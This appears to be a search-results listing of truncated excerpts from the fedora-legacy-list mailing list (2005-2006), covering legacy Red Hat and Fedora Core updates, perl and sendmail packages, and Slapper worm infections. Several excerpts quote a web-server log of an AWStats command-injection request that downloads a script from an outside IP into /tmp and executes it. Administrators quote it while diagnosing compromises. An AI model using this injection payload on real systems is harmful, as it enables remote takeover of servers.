Hi Bill,
> Security is not a concern. I am using redhat 9 because it is almost
> the same as rhel3. This is a test not a production box. What kernel
> can i use to easilly upgrade rhel9 to have the disk quota feature
> because it is not there in 2.4.20-8 kernel. The disk quota feature
> is all
> David Eisenstein wrote:
> > As we continue to talk over where Fedora Legacy is going, and what distro's
> > should or shouldn't be maintained by us, it occurs to me that we are
> > forgetting some important things
> >
> >* How many contributors do we have now that get the work of Fedor
> kles koe wrote:
>
> > why don't you just ask the author of rkhunter to update the hashes
> > for these packges?
> > i think i did once and it was fixed within a few days.
>
> I said I already reported this issue twice, but so far I haven't
> received any reaction and the latest version of t
Hi Eric,
> Quoting Michal Jaegermann <[EMAIL PROTECTED]>:
>
> > I am not sure in which distro /usr/sbin/alternatives showed up
> > for the first time.
>
> It first showed up in RHL 7.3 as far as RHL goes. It originated in
> debian though...
>
> >> *** ERROR: FEATURE() should be before MAILER()
Hi,
> On Friday 24 March 2006 12:54, David Eisner wrote:
>
> > Just a heads up: after installing the
> > sendmail-8.12.11-4.24.1.legacy package on a RH9 machine today, I
> > noticed /usr/lib/sendmail was gone. This will break anything
> > that's expecting it to be there.
> >
> > In my case, symli
Hi,
> On Mon, 20 Mar 2006, Matthew Miller wrote:
>
> > On Tue, Mar 21, 2006 at 07:22:34AM +1000, Michael Mansour wrote:
> > > I'm just wondering has anyone considered updating the tzdata package for
FC1/2?
> > > In Australia for example, our Dayli
Hi,
I'm just wondering has anyone considered updating the tzdata package for FC1/2?
In Australia for example, our Daylight savings time changed due to the
Commonwealth games. Red Hat have released updates for their distributions, but
looking at FC1/2:
FC1# tzdata-2004b-1.fc1
FC2# tzdata-2005f-1.
> >With the release of FC5, I figured I'd start the discussion to gauge
> > the amount of support for keeping FC2 updates going.
> >
> >As specified in the FAQ, Fedora Legacy will pick it up and maintain it
> > for two additional Fedora Core release cycles.
> >
> >I believe FC1 still has the follow
> Greetings all;
>
> What yum install 'name' should I use for name to install an imap
> mail server on a RH7.3 box? I'm going to try and move the spam
> filtering off my desktop machine.
Try dovecot.
Michael.
--
fedora-legacy-list mailing list
fedora-legacy-list@redhat.com
https://www.redhat
Hi Mike,
> > You should do a "netstat -na | grep SYN", if you see alot of those then
> > slapper is there DOS attacking people.
>
> $ netstat -na | grep SYN
> $
>
> Thanks for the advice. But, as I am behind a stealth firewall,
> I feel relatively secured against *this* type of attack.
>
> Umm,
Hi Mike,
> Gene Heskett wrote:
> > On Tuesday 24 January 2006 14:20, Mike Klinke wrote:
> >
> >>On Tuesday 24 January 2006 13:08, Mike McCarty wrote:
> >>
> >>>I'm a little shocked at this, frankly. I Googled around, and
> >>>found mentions of the Slapper going back to 2002. Why is it that
> >>>t
Hi Peter,
> On 2006-01-24 08:46:24 +1000, Michael Mansour wrote:
> > > More generally, I read advice somewhere that mounting /tmp with the
> > > "noexec" option (and making any other temp directories symbolic
> > > links to that one) can make this type
Hi Marc,
> On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote:
> > No I'm not sure. Reading through the link above, it does seem that you've
> > hit
> > the nail on the head with this one. I have two other FC1 machines and they
> > weren't affe
Hi Marc,
> On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote:
>
> > I'm using:
> >
> > perl-5.8.3-17.4.legacy
> > httpd-2.0.51-1.9.legacy
> > openssl-0.9.7a-33.13.legacy
> >
> > Are there any updates FL can do to any of the
Hi Kelson,
> Michael Mansour wrote:
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> > HTT
Hi Mike,
> > 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> > 5.1;)" 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> > mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scrip
> >z%3b%2e%2fscripz;echo%20YYY
Hi James,
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Michael Mansour wrote:
> > Hi guys,
> >
> > I have an FC1 machine which got infected twice with the slapper worm, and
> > then
> > started DOS attacking a large vendor.
> >
> &g
Hi guys,
I have an FC1 machine which got infected twice with the slapper worm, and then
started DOS attacking a large vendor.
I've stopped slapper in its tracks with a couple of changes to FC1, but in
analysing now how it got in (it seems to use SSLv2 vulerabilities in an apache
SSL server which
Hi David,
> > Hi John,
> >
> > > Michael Mansour wrote:
> > > > The perl versions I'm currently using on FC1 are from that directory:
> > > >
> > > > # rpm -q perl perl-suidperl
> > > > perl-5.8.3-18.1.legacy
> >
Hi John,
> Michael Mansour wrote:
> > The perl versions I'm currently using on FC1 are from that directory:
> >
> > # rpm -q perl perl-suidperl
> > perl-5.8.3-18.1.legacy
> > perl-suidperl-5.8.3-18.1.legacy
>
> I built these versions for FC1; howeve
Hi,
> > Hi,
> >
> > I'm trying to apply the latest contrib perl from:
> >
> > http://www.fedoralegacy.org/contrib/perl/
> >
> > namely:
> >
> > perl-5.8.3-19.2.legacy.i386.rpm
> > perl-suidperl-5.8.3-19.2.legacy.i386.rpm
> >
> > but I get the following result:
> >
> > # rpm -Uvh perl-suidper
Hi,
I'm trying to apply the latest contrib perl from:
http://www.fedoralegacy.org/contrib/perl/
namely:
perl-5.8.3-19.2.legacy.i386.rpm
perl-suidperl-5.8.3-19.2.legacy.i386.rpm
but I get the following result:
# rpm -Uvh perl-suidperl-5.8.3-19.2.legacy.i386.rpm
perl-5.8.3-19.2.legacy.i386.rpm
> > Does this affect us?
> >
> > (1) HIGH: Perl Format String Vulnerability
> > Affected:
> > Perl versions 5.9.2 and 5.8.6 confirmed; potentially all Perl versions
> > Webmin version 1.23 and prior
> >
> > Description: Perl is widely used as a scripting language for a variety
> > of applications
Hi David,
> > Hi,
> >
> > When I try and perform a check-update to get the latest FL updates for an
> > FC1
> > machine, I get the following:
> >
> > # yum check-update
> > Setting up repositories
> > Reading repository metadata in from local files
> > primary.xml.gz100% |==
Hi,
When I try and perform a check-update to get the latest FL updates for an FC1
machine, I get the following:
# yum check-update
Setting up repositories
Reading repository metadata in from local files
primary.xml.gz100% |=| 254 kB00:05
http://download.fed
Hi,
> I agree with Jesse and David. It makes no sense to drop FC1 if
> there is still user interest (a'la RH73). A lot of people jumped to
> FC1 when Redhat changed their business practice (which turned out to
> be a very good move for them despite mine and other objections), so
> I think it
> On Wed, Nov 09, 2005 at 05:04:27PM -0500, James Kosin wrote:
> > They also address CVE-2005-3353, CVE-2005-3388, CVE-2005-3389 and
> > CVE-2005-3390...
> > do we need to concern ourselves with these?
>
> Do you plan to wait until attacks will show up?
>
> Michal
Everyday in my logs now I see
> On Wed, 2005-11-09 at 13:27 -0700, Michal Jaegermann wrote:
> > If I understand correctly that is really an XML_RPC vulnerability in
> > pear libraries; so if you do not have such capability, or it is not
> > turned on, then you are not vulnerable. Of course there are some
> > applications which
Hi,
I'm still running FC1 and FC2 servers and am worried about the issues below, I
don't want to be stung by them like I was with the perl exploits earlier (and
fixed through the FL contrib by users).
Will FL be backporting these fixes asap?
Michael.
-- Forwarded Message ---
Fro
> > Yes, although technically that's not the mirror, the true mirror is at
> > http://dl.atrpms.net/mirrors/fedoralegacy/ including yum20 format
> > headers. I wouldn't start changing content in a mirrored part :=)
> >
> > The problem is that yum-arch has a bug that breaks my yum20 repos:
> >
> > h
> Josep L. Guallar-Esteve wrote:
> > On Wednesday 28 September 2005 11:21, James Kosin wrote:
> >
> >>I'm not knocking RedHat, Fedora or Fedora-Legacy this is a good
> >>point. But, some of us need more than just patches to get us by.
> >>I know, If you really want the latest, why not update to F
Hi Gilbert,
--- Gilbert Sebenste <[EMAIL PROTECTED]>
wrote:
> On Wed, 14 Sep 2005, Axel Thimm wrote:
>
> > you probably need to update yum first. Early yum
> versions would easily
> > mask existing packages under certain
> circumstances.
> >
> I have the FC1 version. Where can I get the latest
>
32 matches
Mail list logo
